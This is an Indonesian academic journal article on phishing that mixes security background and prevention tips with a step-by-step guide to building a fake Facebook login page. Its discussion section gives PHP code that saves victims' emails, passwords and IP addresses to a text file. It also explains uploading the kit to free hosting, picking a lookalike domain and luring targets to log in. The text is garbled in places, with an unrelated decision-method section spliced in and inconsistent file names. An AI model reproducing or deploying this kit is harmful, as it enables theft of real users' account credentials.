ISSN - prpm.trigunadharma.ac.id Dian... · kredensial melalui mesin lokal. Informasi yang diperoleh kemudian dikirim ke phisher. 5) Manipulasi tautan (l ink) Manipulasi link adalah

209

PHISING SEBAGAI SALAH SATU BENTUK ANCAMAN DALAM DUNIA CYBER

Dian Rachmawati#1

#1Program Studi Sistem Komputer, Universitas Sumatera UtaraJl. Alumni no.9 Medan

Email : #[email protected]

Abstrak

Kejahatan di dunia siber adalah suatu kondisi yang terkait dengan aktivitas criminal denganmenggunakan komputer atau jaringan komputer sebagai alat bantu dan juga sebagai target. Phisingadalah salah satu bentuk dari kejahatan elektronik dalam bentuk penipuan, dimana korban dipancingdengan tujuan untuk mengambil semua informasi penting. Phising dapat terjadi pada siapa saja darilingkaran apapun. Phising bertujuan untuk mencuri data setelah memanipulasi seseorang dengantampilan situs web tertentu. Penipuan phising dapat dicegah. Pengguna harus berhati-hati ketikamendapatkan email atau link mencurigakan.

Kata Kunci: Phising, Cyber Crime, Computer Security, Deface

Abstract

Cyber crimes is a term that refers to criminal activity with a computer or network of computers asa tool and a target. Phishing is one form of electronic crime in the form of fraud, where the victim infishing to take all the important information. Phishing can happen to anyone of any circle. Phishing is tosteal data after defacing someone on view certain websites. Phishing scams can be prevented. User mustbe careful when getting suspicious email or link.

Keywords :Phising , Cyber Crime , Computer Security, Deface

ISSN : 1978-6603

Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber

Jurnal SAINTIKOM Vol. 13, No.3, September 2014 210

PENDAHULUANDalam dunia komunikasi data global

dan perkembangan teknologi informasi yangsenantiasa berubah serta cepatnyaperkembangan software, keamananmerupakan suatu isu yang sangat penting,baik itu keamanan fisik, data maupun aplikasi.Masalah keamanan dankerahasiaan datamerupakan salah satu aspek penting darisuatu sistem informasi.

Keamanan komputer adalah suatucabang teknologi yang dikenal dengan namakeamanan informasi yang diterapkan padakomputer. Sasaran keamanan komputerantara lain adalah sebagai perlindunganinformasi terhadap pencurian atau korupsi,atau pemeliharaan ketersediaan, sepertidijabarkan dalam kebijakan keamanan.Menurut Howard (1997) dalam bukunya “AnAnalysis of security incidents on the internet’menyatakan bahwa:

Keamanan komputer adalah tindakanpencegahan dari serangan penggunakomputer atau pengakses jaringan yang tidakbertanggung jawab.

Menurut Gollmann (2006) dalambukunya “Computer Security” menyatakanbahwa:

Keamanan komputer adalahberhubungan dengan pencegahan diri dandeteksi terhadap tindakan pengganggu yangtidak dikenali dalam sistem komputer.

Dalam keamanan sistem komputeryang perlu dilakukan adalah untukmempersulit orang lain untuk mengganggusistem yang dipakai, baik itu menggunakankomputer yang sifatnya stand alone, jaringanlocal maupun jaringan global. Harusmemastikan sitem bisa berjalan dengan baikdan kondusif (ditemukenali, 10 April 2014

pada http://www.it-artikel.com/2012/04/artikel-hardware-komputer.html.

Menurut Garfinkel dan Spafford, ahli dalamcomputer security, komputer dikatakan aman jikabisa diandalkan dan perangkat lunaknyabekerja sesuai dengan yang diharapkan.

Menurut Bruce (1996), Inti darikeamanan komputer adalah melindungikomputer dan jaringannya dengan tujuanmengamankan informasi yang berada didalamnya. Keamanan komputer sendirimeliputi beberapa aspek, antara lain:

1. Kerahasiaan (Confidentiality)Layanan yang digunakan untukmenjaga informasidari siapapun, kecuali yang memilikikunci rahasia atau otoritas untukmembuka informasi yang telahdisandikan.

2. IntegrityPenjagaan atau perlindungan data dariupaya pengubahan data secara tidaksah. Untuk dapat menjaga keutuhandata, suatu system harus dapatmendeteksi manipulasi data dari pihak-pihak yang tidak berhak antara lainpenyisipan, penghapusan, danpendistribusian data lain ke dalam datayang asli.

3. AuthenticationBerhubungan dengan identifikasi, baikkesatuan system maupun informasi itusendiri. Dua pihak yang salingberkomunikasi harus salingmemperkenalkan diri. Informasi yangdikirimkan harus diautentikasi keaslian,isi data, waktu pengiriman dansebagainya.


211 Jurnal SAINTIKOM Vol. 13, No.3, September 2014

4. Non RepudiationMerupakan usaha untuk mencegahterjadinya penyangkalan terhadappengiriman/terciptanya suatuinformasi oleh yangmengirimkan/membuat, jugasebaliknya.

Dalam ruang lingkup keamanankomputer, phising adalah salah bentukkejahatan elektronik dalam bentuk penipuan.Dimana proses phising ini bermaksud untukmenangkap informasi yang sangat sensitifseperti username, password dan detil kartukredit dalam bentuk menyaru sebagai sebuahentitas yang dapat dipercaya/ legitimateorganization dan biasanya berkomunikasisecara elektronik.

Phising diperkenalkan pertama kalipada tahun 1995. Menurut James (2005) carapertama yang dilakukan phisher adalahdengan menggunakan algoritma yangmembuat nomor kartu kredit secara acak.Jumlah kredit acak kartu yang digunakanuntuk membuat rekening AOL. Akun tersebutkemudian digunakan untuk spam penggunalain dan untuk berbagai hal lainnya. Program-program khusus seperti AOHell digunakanuntuk menyederhanakan proses. Praktek inidiakhiri oleh AOL pada tahun 1995, ketikaperusahaan membuat langkah-langkahkeamanan untuk mencegah keberhasilanpenggunaan angka kredit secara acak kartu.

Phising dikenal juga sebagai “Brandspoofing” atau “Carding” adalah sebuahbentuk layanan yang menipu anda denganmenjanjikan keabsahan dan keamanantransfer data yang anda lakukan. MenurutFelten et al spoofing (1997) dapatdidefinisikan sebagai “Teknik yang digunakanuntuk memperoleh akses yang tidak sah kesuatu komputer atau informasi, dimana

penyerang berhubungan dengan penggunadengan berpura-pura memalsukan bahwamereka adalah host yang dapat dipercaya”.

TINJAUAN PUSTAKA

1.1 Cara Kerja Phising

Dari definisi phising dapat diketahuicara kerja dari phising tersebut yang dilakukanuntuk menjebak korban oleh sang penjebak(phisher). Phising yaitu aktivitas seseoranguntuk mendapatkan informasi rahasia userdengan cara menggunakan email dan situsweb palsu yang tampilannya menyerupaitampilan asli atau resmi web sebenarnya.

Informasi yang didapat atau dicari olehphiser adalah berupa password account ataunomor kartu kredit korban. Penjebak(phisher) menggunakan email, banner ataupop-up window untuk menjebak user agarmengarahkan ke situs web palsu (fakewebpage), dimana user diminta untukmemberikan informasi pribadinya. Disinilahphisher memanfaatkan kecerobohan danketidak telitian user dalam web palsutersebut untuk mendapatkan informasi. Carakerja phising terlihat pada gambar 1:

Gambar 1 Cara Kerja dan Alur informasiPhising



Berikut ini adalah aspek-aspek ancaman yangterinfeksi oleh virus phising:

1) Manipulasi LinkSebagian teknik phising menggunakan

manipulasi link sehingga yang terlihat sepertialamat dari institusi yang asli. URL yang salahejaannya atau penggunaan subdomain adalahtrik umum digunakan oleh phisher, seperticontoh URL dibawah:

www.micosoft.comwww.mircosoft.comwww.verify-microsoft.comdan bukannya www.microsoft.com

2) Filter EvasionPhisher telah menggunakan gambar (bukan

teks) sehingga mengecoh pengguna sehinggamenyerahkan informasi pribadinya. Ini adalahalasan Gmail atau Yahoo akan mematikangambar secara default untuk email yangmasuk.Gambar 2 adalah salah satu contoh emailphising:

Gambar 2 Email Phising yang dihubungkan kesebuah halaman web

Untuk membuat e-mail phising tampak lebihasli, para phisher/scammer akan meletakkan:

Sebuah link yang dihubungkan ke halamanweb yang sah, tetapi sebenarnya

membawa anda ke sebuah laman webphising

Atau mungkin pop-up yang tampak persisseperti halaman resmi.

2.2 Teknik PhisingDalam memancing korbannya seorang

phiser melakukan beberapa teknik antara lain:

1) Email SpoofingTeknik ini biasa digunakan phiser denganmengirim email ke jutaan penggunaandengan me’nyaru’ berasal dari institusiresmi. Biasanya email berisi pemintaannomor kredit, password ataumendownload form tertentu (Joshi,2012:5).

2) Pengiriman Berbasis WebPengiriman berbasis web adalah salahsatu teknik Phising yang paling canggih.Juga dikenal sebagai “man-in-the-middle”, hacker terletak diantara situsweb asli dan sistem phising.

3) Pesan Instan (chatting)Olah pesan cepat adalah metode dimanapengguna menerima pesan dengan linkyang mengarahkan mereka ke situs webPhising palsu yang memiliki tampilanyang sama dan merasa sebagai situsyang sah.

4) Trojan hostsTrojan hosts, hacker terlihat mencoba untuk login ke account pengguna andauntuk mengumpulkankredensial melalui mesin lokal. Informasiyang diperoleh kemudian dikirim kephisher.

5) Manipulasi tautan (link)Manipulasi link adalah teknik dimanaphisher mengirimkan link ke sebuah











































website. Bila pengguna mengklik padalink tersebut maka akan terbuka kewebsite phisher bukan link websitesebenarnya.

6) Malware PhisingPenipuan phising melibatkan malwarememerlukan cara untuk dijalankan padakomputer pengguna. Malware inibiasanya melekat pada email yangdikirimkan kepada pengguna olehphisher. Setelah korban mengklik padalink maka malware akan mulai berfungsi.Malware tersebut terkadang disertakanpada file download.

PembahasanPhising dalam bentuk web spoofing

dapat dibuat menggunakan software MS-Front Page, XAMPP, Notepad, sertaDreamweaver.

Berikut penjelasan bagaimana carapembuatan Phising:

1. Tentukan target website (dalampembahasan inihttp://www.facebook.com/ )

2. Tekan CTRL+U (nanti akan tampil script).3. Select all (CTRL+A), trus copy (CTRL+C),

pastekan(CTRL+V) di notepad.4. Search (CTRL+F), lalu masukan.

action=https://www.facebook.com/login.php?login_attempt=1

5. Ganti https://www.facebook.com/login.php?login_attempt=1 dengan script.php

6. Save file tersebut dengan nama index.html7. New file (CTRL+N)8. Pastekan script berikut ini [9]

<?php$file = "storage.txt";

$username = $_POST['email'];$password = $_POST['pass'];$ip = $_SERVER['REMOTE_ADDR'];$today = date("F j, Y, g:i a");

$handle = fopen($file, 'a');fwrite($handle,"++++++++++++++++++++++++++++++++++++++++++++++++++++");fwrite($handle, "\n");fwrite($handle, "Email: ");fwrite($handle, "$username");fwrite($handle, "\n");fwrite($handle, "Password: ");fwrite($handle, "$password");fwrite($handle, "\n");fwrite($handle, "IP Address: ");fwrite($handle, "$ip");fwrite($handle, "\n");fwrite($handle, "Date Submitted: ");fwrite($handle, "$today");fwrite($handle, "\n");fwrite($handle,"++++++++++++++++++++++++++++++++++++++++++++++++++++");fwrite($handle, "\n");fwrite($handle, "\n");fclose($handle);echo "<script LANGUAGE=\"JavaScript\"></script>";?></div></div></form>

9. Save file dengan nama script.php10. New file (CTRL+N)11. Ketik : Hasil Phising akan tersimpan disini12. Save file dengan nama storage.txt13. Upload file itu ke hostingan anda.

Misal idhostinger.com



14. Untuk cara upload file ke hostingan,lakukan cara berikut :

15. Buatlah akun pada idhostinger.com16. Isi formulir pendaftaran dengan benar

sebagai contoh gambar 3

Gambar 3 Formulir Pendaftaran

17. Jangan lupa check list "saya setuju denganketentuan penggunaan layanan" lalu klik"Buat Akun".

18. Setelah itu anda masuk ke akun emailanda untuk verifikasi akun hosting anda

19. Klik tautan yang ada di kotak masuk yahooanda untuk mengaktifkan akun hosting.

20. Kini akun anda sudah aktif dan anda akandiarahkan kehttp://cpanel.idhostinger.com/switcher.Disitu anda klik "buat akun baru".

21. Pilih yang gratis (sebelah kiri) dan klik"order!”

22. Selanjutnya, anda pilih domain dan isikolom tersebut. Kolom domain isikandengan domain (link) yang nantinya akandijadikan phising. Domain (link) pilihdengan nama yang mirip dengan web yangingin diduplikasi terlihat pada gambar 4.

Gambar 4 Pemilihan Domain untuk Web Phising

23. Klik "buat" dan tunggu prosespembuatannya.

24. Jika domain sudah dibuat, klik "beralih"pada sebelah kanan

25. Kini anda berada pada cpanel domainanda. Anda gulung kebawah scroll barnya.Masuk ke file manager 3 terlihatpadagambar 5.

Gambar 5 Cpanel Domain

26. Selanjutnya anda masuk ke public html.Nah silahkan anda upload ketiga filephising tadi disitu dengan cara klik"upload".

27. Klik "pilih file" untuk memilih scriptphisingnya dan klik tanda cawang hijauuntuk upload pada gambar 6.









































Gambar 6 Pemilihan Script Phising

28. Klik lagi tanda cawang hijaunya padagambar 7.

29. Selanjutnya klik tanda panah biru.30. Jangan lupa ubah chmod/permissionnya

menjadi 777 dengan cara centang"logs.txt" lalu klik "chmod pada gambar 8.

3. Metode Multifactor EvaluationProcess(MFEP)

Dalam metode MFEP ini pengambilankeputusan dilakukan dengan memberikanpertimbangan subyektif dan intuitif terhadapFaktor yang dianggap penting. Pertimbangan-pertimbangan tersebut berupa pemberianbobot (weightingsystem) atas multifactor yangterlibat dan dianggap penting tersebut.

Gambar 8 Setting Chmod Direktori dan File

31. Klik tanda panah biru untuk kembali kepublic html.

32. Sekarang anda buka domain anda danjadilah phising facebook anda padagambar 9. Silahkan anda jebak targetanda untuk masuk ke web phising andadan suruh loginkan akun facebooknyadisitu. Alhasil email dan passwordnyaakan tersimpan di logs.tx

Gambar 9 Halaman Phising Facebook

SimpulanPhising adalah sebuah bentuk layanan

yang bersifat menipu dengan menjanjikankeabsahan dan keamanan transfer data.Berikut 10 tips Kaspersky Lab untuk mencegahdari serangan phising:

1. Untuk situs sosial seperti Facebook, buatbookmark untuk halaman login atau

































mengetik URL www.facebook.com secaralangsung di browser address bar.

2. Jangan mengklik link pada pesan email.3. Hanya mengetik data rahasia pada website

yang aman.4. Mengecek akun bank Anda secara regular

dan melaporkan apapun yangmencurigakan kepada bank Anda.

5. Kenali tanda giveaway yang ada dalamemail phisinga. Jika hal itu tidak ditujukan secara

personal kepada anda.b. Jika anda bukan satu-satunya

penerima email.c. Jika terdapat kesalahan ejaan, tata

bahasa atau sintaks yang buruk ataukekakuan lainnya dalam penggunaanbahasa. Biasanya ini dilakukanpenyebar phising untuk mencegahfiltering.

6. Menginstall software untuk kemananinternet dan tetap mengupdate antivirus.

7. Menginstall patch keamanan.8. Waspada terhadap email dan pesan instan

yang tidak diminta.9. Berhati-hati ketika login yang meminta hak

administrator. Cermati alamat URL-nyayang ada di address bar.

10. Back up data anda.

DAFTAR PUSTAKAHoward, J.1997. An Analysis of Security

Incidents on the Internet 1989-1995,(PhD thesis). Engineering and PublicPolicy: Carnegie Mellon University.

Golmann, Dieter. 2006. Computer Security.England: John Wiley.

Schneier, Bruce. 1996.Applied Cryptography:Protocols, Algorithms, and Source Codein C, 2nd ed, John Wiley & Son Inc: NewJersey.

James, L. 2005. Phishing Exposed, MA:Syngress. Maryland.

Preeti, Emmanuel, Joshi. 2012.ForensicAnalysis of Email Date and TimeSpoofing, Proceedings of the 2012Third International Conference onComputer and CommunicationTechnology: India.

http://tekno.kompas.com/read/2009/05/27/17001058/10.Tips.Mencegah.Serangan.Phising

http://ramadhanlmzero.blogspot.com/2013/02/cara-membuat-phising-facebook.html

Web Spoofing: An Internet Con Game. EdwardW. Felten, Dirk Balfanz, Drew Dean,and Dan S. Wallach, Technical Report:540-96.

Department of Computer Science, PrincetonUniversity, revised February 1997(Original version: December 1996)

http://newsatthisblog.blogspot.com/2013/04/cara-membuat-phising-facebook.html

http://www.it-artikel.com/2012/04/artikel-hardware-komputer.html

Documents

ISSN - prpm.trigunadharma.ac.id Dian... · kredensial melalui mesin lokal. Informasi yang diperoleh kemudian dikirim ke phisher. 5) Manipulasi tautan (l ink) Manipulasi link adalah